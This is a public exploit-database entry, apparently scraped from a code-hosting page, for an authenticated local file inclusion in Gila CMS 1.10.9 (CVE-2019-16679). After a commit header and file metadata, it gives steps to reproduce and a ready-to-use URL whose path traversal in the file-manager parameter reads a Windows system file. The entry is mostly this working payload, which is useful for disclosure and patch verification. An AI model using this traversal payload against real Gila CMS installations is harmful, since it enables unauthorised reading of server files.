afd22dbcb0
3 changes to exploits/shellcodes Hisilicon HiIpcam V100R003 Remote ADSL - Credentials Disclosure HPE Intelligent Management Center < 7.3 E0506P09 - Information Disclosure Gila CMS < 1.11.1 - Local File Inclusion
18 lines
No EOL
673 B
Text
18 lines
No EOL
673 B
Text
# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS
|
|
# Google Dork: N/A
|
|
# Date: 04-08-2019
|
|
# Exploit Author: Sainadh Jamalpur
|
|
# Vendor Homepage: https://github.com/GilaCMS/gila
|
|
# Software Link: https://github.com/GilaCMS/gila
|
|
# Version: 1.10.9
|
|
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,
|
|
# CVE : CVE-2019-16679
|
|
|
|
*********** *Steps to reproduce the Vulnerability* *************
|
|
|
|
Login into the application as an admin user or equivalent user and go the
|
|
below link
|
|
|
|
http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts
|
|
|
|
################################################################ |